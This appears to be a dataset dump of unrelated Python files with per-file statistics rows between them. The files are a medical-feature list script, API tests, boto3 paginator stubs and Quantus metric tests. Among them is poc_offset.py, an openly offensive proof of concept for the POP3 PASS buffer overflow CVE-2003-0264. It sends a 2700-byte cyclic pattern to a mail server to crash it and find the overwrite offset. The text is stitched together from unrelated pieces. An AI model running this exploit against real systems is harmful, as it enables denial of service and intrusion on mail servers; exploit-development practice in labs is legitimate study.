"Bicarbonate skew",
"Bicarbonate std",
"sex",
"age",
"ethnicity",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std"
]
elif args.top_fc==42:
features = [
"Blood culture max",
"Blood culture mean",
"Blood culture min",
"Blood culture skew",
"Blood culture std",
"sex",
"age",
"ethnicity",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Red blood cell count max",
"Red blood cell count mean",
"Red blood cell count min",
"Red blood cell count skew",
"Red blood cell count std",
"Glucose max",
"Glucose mean",
"Glucose min",
"Glucose skew",
"Glucose std",
"Cholesterol max",
"Cholesterol mean",
"Cholesterol min",
"Cholesterol skew",
"Cholesterol std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"Calcium max",
"Calcium mean",
"Calcium min",
"Calcium skew",
"Calcium std",
"Lactate dehydrogenase max",
"Lactate dehydrogenase mean",
"Lactate dehydrogenase min",
"Lactate dehydrogenase skew",
"Lactate dehydrogenase std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Chloride max",
"Chloride mean",
"Chloride min",
"Chloride skew",
"Chloride std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Mean corpuscular hemoglobin concentration max",
"Mean corpuscular hemoglobin concentration mean",
"Mean corpuscular hemoglobin concentration min",
"Mean corpuscular hemoglobin concentration skew",
"Mean corpuscular hemoglobin concentration std",
"Mean corpuscular hemoglobin max",
"Mean corpuscular hemoglobin mean",
"Mean corpuscular hemoglobin min",
"Mean corpuscular hemoglobin skew",
"Mean corpuscular hemoglobin std",
"Partial thromboplastin time max",
"Partial thromboplastin time mean",
"Partial thromboplastin time min",
"Partial thromboplastin time skew",
"Partial thromboplastin time std",
"Prothrombin time max",
"Prothrombin time mean",
"Prothrombin time min",
"Prothrombin time skew",
"Prothrombin time std",
"Magnesium max",
"Magnesium mean",
"Magnesium min",
"Magnesium skew",
"Magnesium std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Anion gap max",
"Anion gap mean",
"Anion gap min",
"Anion gap skew",
"Anion gap std",
"Sodium max",
"Sodium mean",
"Sodium min",
"Sodium skew",
"Sodium std",
"Phosphate max",
"Phosphate mean",
"Phosphate min",
"Phosphate skew",
"Phosphate std",
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Mean corpuscular volume max",
"Mean corpuscular volume mean",
"Mean corpuscular volume min",
"Mean corpuscular volume skew",
"Mean corpuscular volume std",
"Hematocrit max",
"Hematocrit mean",
"Hematocrit min",
"Hematocrit skew",
"Hematocrit std",
"Eosinophils max",
"Eosinophils mean",
"Eosinophils min",
"Eosinophils skew",
"Eosinophils std",
"Asparate aminotransferase max",
"Asparate aminotransferase mean",
"Asparate aminotransferase min",
"Asparate aminotransferase skew",
"Asparate aminotransferase std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"Monocytes max",
"Monocytes mean",
"Monocytes min",
"Monocytes skew",
"Monocytes std",
"Albumin max",
"Albumin mean",
"Albumin min",
"Albumin skew",
"Albumin std",
"Bilirubin max",
"Bilirubin mean",
"Bilirubin min",
"Bilirubin skew",
"Bilirubin std",
"Hemoglobin max",
"Hemoglobin mean",
"Hemoglobin min",
"Hemoglobin skew",
"Hemoglobin std",
"Alanine aminotransferase max",
"Alanine aminotransferase mean",
"Alanine aminotransferase min",
"Alanine aminotransferase skew",
"Alanine aminotransferase std",
"Troponin-I max",
"Troponin-I mean",
"Troponin-I min",
"Troponin-I skew",
"Troponin-I std",
"Platelets max",
"Platelets mean",
"Platelets min",
"Platelets skew",
"Platelets std",
"Alkaline phosphate max",
"Alkaline phosphate mean",
"Alkaline phosphate min",
"Alkaline phosphate skew",
"Alkaline phosphate std",
"Neutrophils max",
"Neutrophils mean",
"Neutrophils min",
"Neutrophils skew",
"Neutrophils std",
"Lymphocytes max",
"Lymphocytes mean",
"Lymphocytes min",
"Lymphocytes skew",
"Lymphocytes std",
"Basophils max",
"Basophils mean",
"Basophils min",
"Basophils skew",
"Basophils std",
"Troponin-T max",
"Troponin-T mean",
"Troponin-T min",
"Troponin-T skew",
"Troponin-T std",
]
else:
features = []
else:
features = []
print(tabulate_weights(features,f_imp))
# Count total and non-zero weights.
count = len(f_imp)
nz = sum(1 for x in f_imp if x > 0)
print("Weight count = "+str(count))
print("Non-zero count = "+str(nz))
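The hard-coded feature lists above repeat the same five summary statistics (`max`, `mean`, `min`, `skew`, `std`) for every measurement, so they could be generated from the base measurement names instead. A sketch — `expand_features` and the sample base names are illustrative, not part of the script:

```python
STATS = ("max", "mean", "min", "skew", "std")

def expand_features(base_names, extra=()):
    """Build '<measurement> <statistic>' feature names, plus any extra columns
    (demographics such as sex/age/ethnicity) appended unchanged."""
    feats = [f"{name} {stat}" for name in base_names for stat in STATS]
    feats.extend(extra)
    return feats

# Two measurements plus the demographic columns -> 13 feature names.
features = expand_features(
    ["Bicarbonate", "Blood urea nitrogen"],
    extra=["sex", "age", "ethnicity"],
)
```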
| 39.877072 | 149 | 0.439022 | 2,394 | 28,871 | 5.218463 | 0.101504 | 0.021612 | 0.033619 | 0.024013 | 0.841831 | 0.816137 | 0.80445 | 0.799488 | 0.779957 | 0.769551 | 0 | 0.011668 | 0.474559 | 28,871 | 723 | 150 | 39.932227 | 0.811866 | 0.021094 | 0 | 0.84375 | 0 | 0 | 0.388129 | 0.00216 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001488 | false | 0.001488 | 0.016369 | 0 | 0.019345 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f0f4a029cc030865dc89a4b8ea449c35e99fb0ba | 135 | py | Python | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | from scatsutilities import __version__
from scatsutilities import scatsutilities
def test_version():
assert __version__ == '0.1.0' | 27 | 41 | 0.8 | 16 | 135 | 6.1875 | 0.5625 | 0.363636 | 0.484848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.133333 | 135 | 5 | 42 | 27 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.036765 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5003e370847392094b79362ef27a648abe2123fe | 109 | py | Python | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | 1 | 2020-03-26T15:13:10.000Z | 2020-03-26T15:13:10.000Z | from carrierx.resources.flexml.calls import Call, Calls
from carrierx.resources.flexml.dids import Did, Dids
| 36.333333 | 55 | 0.834862 | 16 | 109 | 5.6875 | 0.5625 | 0.263736 | 0.461538 | 0.593407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091743 | 109 | 2 | 56 | 54.5 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aca682b4553ce8873ac4035a245b5c2b61c04705 | 2,876 | py | Python | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | from flask_api import status
def test_get(client):
r = client.get('/currency_converter/?amount=100&input_currency=EUR&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 100
assert payload['input']['currency'] == 'EUR'
assert len(payload['output']) == 1
assert payload['output']['CZK']
def test_get_lowercase(client):
r = client.get('/currency_converter/?amount=100&input_currency=eur&output_currency=czk')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 100
assert payload['input']['currency'] == 'EUR'
assert len(payload['output']) == 1
assert payload['output']['CZK']
def test_get_input_symbol(client):
r = client.get('/currency_converter/?amount=0.9&input_currency=¥&output_currency=AUD')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 0.9
assert payload['input']['currency'] == 'CNY'
assert len(payload['output']) == 1
assert payload['output']['AUD']
def test_get_no_output(client):
r = client.get('/currency_converter/?amount=10.92&input_currency=£')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 10.92
assert payload['input']['currency'] == 'GBP'
assert len(payload['output']) > 1
def test_get_missing_amount(client):
r = client.get('/currency_converter/?input_currency=EUR&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert payload['errors']['amount'] == 'Missing required parameter in the query string'
assert payload['message'] == 'Input payload validation failed'
def test_get_missing_input(client):
r = client.get('/currency_converter/?amount=100&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert payload['errors']['input_currency'] == 'Missing required parameter in the query string'
assert payload['message'] == 'Input payload validation failed'
def test_get_invalid_input(client):
r = client.get('/currency_converter/?amount=100&input_currency=blabla&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert 'is not valid currency name or symbol' in payload['errors']['input_currency']
assert payload['message'] == 'Input payload validation failed'
def test_get_invalid_output(client):
r = client.get('/currency_converter/?amount=100&input_currency=EUR&output_currency=blabla')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert 'is not valid currency name or symbol' in payload['errors']['output_currency']
assert payload['message'] == 'Input payload validation failed'
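The symbol and case handling these tests exercise (¥ resolves to CNY, £ to GBP, lowercase codes are accepted, unknown tokens produce "is not valid currency name or symbol") can be sketched as a small resolver. `resolve_currency` and its symbol table are assumptions inferred only from the assertions above, not the service's actual implementation:

```python
# Hypothetical symbol table; the real API may support more symbols.
CURRENCY_SYMBOLS = {"€": "EUR", "£": "GBP", "¥": "CNY", "$": "USD"}

def resolve_currency(token):
    """Resolve a currency symbol or case-insensitive code to an ISO 4217 code."""
    token = token.strip()
    if token in CURRENCY_SYMBOLS:
        return CURRENCY_SYMBOLS[token]
    code = token.upper()
    if len(code) == 3 and code.isalpha():
        return code
    raise ValueError(f"{token!r} is not valid currency name or symbol")
```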
| 35.506173 | 98 | 0.708971 | 391 | 2,876 | 5.028133 | 0.153453 | 0.112411 | 0.040692 | 0.065107 | 0.869786 | 0.858087 | 0.841302 | 0.821465 | 0.741607 | 0.715158 | 0 | 0.02498 | 0.150904 | 2,876 | 80 | 99 | 35.95 | 0.779279 | 0 | 0 | 0.517857 | 0 | 0 | 0.369263 | 0.17872 | 0 | 0 | 0 | 0 | 0.553571 | 1 | 0.142857 | false | 0 | 0.017857 | 0 | 0.160714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
accca6df74a92d0a80013243a10f49d59c196873 | 5,117 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Dict
from botocore.paginate import Paginator
class ListHapgs(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_hapgs`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListHapgs>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'HapgList': [
'string',
],
}
**Response Structure**
- *(dict) --*
- **HapgList** *(list) --*
The list of high-availability partition groups.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListHsms(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_hsms`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListHsms>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'HsmList': [
'string',
],
}
**Response Structure**
- *(dict) --*
Contains the output of the ``ListHsms`` operation.
- **HsmList** *(list) --*
The list of ARNs that identify the HSMs.
- *(string) --*
An ARN that identifies an HSM.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListLunaClients(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_luna_clients`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListLunaClients>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ClientList': [
'string',
],
}
**Response Structure**
- *(dict) --*
- **ClientList** *(list) --*
The list of clients.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
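A minimal, AWS-free sketch of the `PageSize` / `StartingToken` / `MaxItems` semantics the docstrings above describe. `paginate_list` is illustrative only — botocore's real paginators drive repeated API calls, not in-memory lists:

```python
def paginate_list(items, page_size, starting_token=None, max_items=None):
    """Yield pages of `items` with a NextToken, mimicking the documented
    PaginationConfig semantics (sketch, not botocore)."""
    start = int(starting_token) if starting_token else 0
    remaining = len(items) - start if max_items is None else max_items
    while start < len(items) and remaining > 0:
        chunk = items[start:start + min(page_size, remaining)]
        yield {"List": chunk, "NextToken": str(start + len(chunk))}
        remaining -= len(chunk)
        start += len(chunk)
```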
| 37.350365 | 224 | 0.530389 | 486 | 5,117 | 5.563786 | 0.236626 | 0.044379 | 0.031065 | 0.035503 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0 | 0.012971 | 0.367207 | 5,117 | 136 | 225 | 37.625 | 0.822112 | 0.733438 | 0 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0.272727 | 0.181818 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
acdfc7cfed01351b766dcec9b2b8f65c35ae43bf | 3,132 | py | Python | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | import socket
import time
print("[+] Initiating the Crash Now!\n")
import string

# Rebuild the classic Metasploit cyclic pattern (pattern_create); this
# reproduces the original hard-coded 2700-byte "Aa0Aa1...Dl9" literal exactly.
def pattern_create(length):
    pattern = ""
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                pattern += upper + lower + digit
                if len(pattern) >= length:
                    return pattern[:length]
    return pattern

buff = pattern_create(2700)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 110))
s.recv(1024)  # Receive the banner
# Enter the user
s.send('USER hacker\r\n'.encode())
s.recv(1024)
# Finally, the vulnerable command: PASS (bytes are required on Python 3 sockets)
s.send(('PASS ' + buff + '\r\n').encode())
s.send(b'QUIT\r\n')
s.close()
time.sleep(0.5)
print("[+] Done!")
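After the crash, the value left in EIP is looked up in the cyclic pattern to recover the overwrite offset. A minimal sketch of that pattern_offset step — `eip_to_substring` and the example EIP value are illustrative, not output from this PoC:

```python
def eip_to_substring(eip_hex):
    """Convert a debugger EIP value such as '41306141' into the ASCII run as it
    appears in the pattern (bytes reversed for little-endian x86)."""
    return bytes.fromhex(eip_hex)[::-1].decode("ascii")

def pattern_offset(pattern, value):
    """Return the offset of the decoded EIP substring in the pattern, or -1."""
    return pattern.find(value)
```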
| 111.857143 | 2,709 | 0.9553 | 76 | 3,132 | 39.342105 | 0.565789 | 0.005017 | 0.00301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.300456 | 0.019157 | 3,132 | 27 | 2,710 | 116 | 0.672852 | 0.028736 | 0 | 0.133333 | 0 | 0 | 0.917325 | 0.889328 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.2 | 0 | 0.2 | 0.133333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
4a0809ecd080a5182b0d4ea607a70d399cb0b9ba | 39 | py | Python | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
] | null | null | null | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
] | null | null | null | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
] | null | null | null | from . import app
from . import routes
| 13 | 20 | 0.74359 | 6 | 39 | 4.833333 | 0.666667 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 39 | 2 | 21 | 19.5 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4a2145b06c10a85214d0ac16b32ea169da729813 | 138 | py | Python | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 5 | 2020-08-04T16:44:14.000Z | 2021-08-21T02:23:03.000Z | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 1 | 2021-03-21T16:33:58.000Z | 2021-03-21T16:33:58.000Z | module2/__init__.py | axel-sirota/advanced-generator-and-coroutines | fbb4f869b030a05dc10b4a49e9a091068d11e194 | [
"MIT"
] | 4 | 2020-10-22T11:40:15.000Z | 2022-01-30T19:42:07.000Z | from .mybomb import MyBomb
from .mybombgenerator import mybomb
from .mybomblazy import MyNotLazyBomb, mylazygenerator
from .demo import *
| 27.6 | 54 | 0.833333 | 16 | 138 | 7.1875 | 0.5 | 0.208696 | 0.278261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123188 | 138 | 4 | 55 | 34.5 | 0.950413 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c58b7263ea78bebba9c7c1cd06a3cce85120c5cc | 10,784 | py | Python | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_complexity_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | from typing import Union
import numpy as np
import pytest
from pytest_lazyfixture import lazy_fixture
from ..fixtures import *
from ...quantus.metrics import *
from ...quantus.helpers import *
from ...quantus.helpers.explanation_func import explain
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("almost_uniform_2d_no_abatch"),
{
"normalise": False,
"explain_func": explain,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": True,
"display_progressbar": True,
},
{"max": 1.0, "min": 0.0},
),
],
)
def test_sparseness(
model: ModelInterface,
data: dict,
params: dict,
expected: Union[float, dict, bool],
):
scores = Sparseness(**params)(
model=model,
x_batch=data["x_batch"],
y_batch=data["y_batch"],
a_batch=data["a_batch"],
**params
)
if isinstance(expected, float):
assert all(s == expected for s in scores), "Test failed."
else:
assert all(
((s > expected["min"]) & (s < expected["max"])) for s in scores
), "Test failed."
@pytest.mark.complexity
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
"disable_warnings": False,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": True,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_1d"),
{
"normalise": False,
"abs": False,
"disable_warnings": True,
"display_progressbar": False,
},
{"max": 1.0, "min": 0.0},
),
(
None,
lazy_fixture("almost_uniform_2d"),
{
"normalise": False,
